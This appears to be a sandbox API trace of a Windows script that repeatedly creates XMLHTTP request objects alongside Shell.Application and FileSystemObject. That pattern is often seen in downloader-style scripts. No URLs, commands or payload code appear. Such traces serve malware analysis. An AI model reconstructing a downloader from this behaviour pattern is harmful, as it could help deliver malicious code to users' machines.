	[0564.629] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0564.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0564.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0564.630] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0564.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0564.630] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0564.630] SysStringLen (param_1=0x0) returned 0x0
	[0564.630] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0564.630] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0564.630] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0564.630] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0564.630] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0564.630] ??2@YAPEAX_K@Z () returned 0x62f350
	[0564.630] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0564.630] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0564.630] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0564.631] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0564.631] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0564.631] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0564.631] SysStringLen (param_1=0x0) returned 0x0
	[0564.631] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0564.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0564.634] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0564.634] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0564.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0564.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0564.634] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0566.713] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0566.714] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0566.714] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0566.715] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0566.715] SysStringLen (param_1=0x0) returned 0x0
	[0566.715] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0566.715] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0566.715] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0566.716] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0566.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0566.716] ??2@YAPEAX_K@Z () returned 0x62f310
	[0566.716] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0566.716] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0566.716] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0566.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0566.716] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0566.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0566.716] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0566.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0566.719] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0566.719] SysStringLen (param_1=0x0) returned 0x0
	[0566.719] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0566.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0566.719] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0566.719] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0566.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0566.719] ??2@YAPEAX_K@Z () returned 0x62f330
	[0566.719] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0566.719] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0566.719] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0566.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0566.719] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0566.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0566.720] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0566.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0566.720] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0566.720] SysStringLen (param_1=0x0) returned 0x0
	[0566.720] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0566.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0566.720] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0566.720] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0566.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0566.720] ??2@YAPEAX_K@Z () returned 0x62f310
	[0566.720] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0566.720] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0566.721] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0566.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0566.721] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0566.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0566.721] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0566.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0566.721] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0566.721] SysStringLen (param_1=0x0) returned 0x0
	[0566.721] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0566.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0566.721] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0566.721] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0566.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0566.721] ??2@YAPEAX_K@Z () returned 0x62f330
	[0566.722] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0566.722] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0566.722] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0566.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0566.722] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0566.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0566.722] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0566.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0566.722] longjmp () 
	[0566.722] longjmp () 
	[0566.722] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0566.722] SysStringLen (param_1=0x0) returned 0x0
	[0566.722] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0566.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
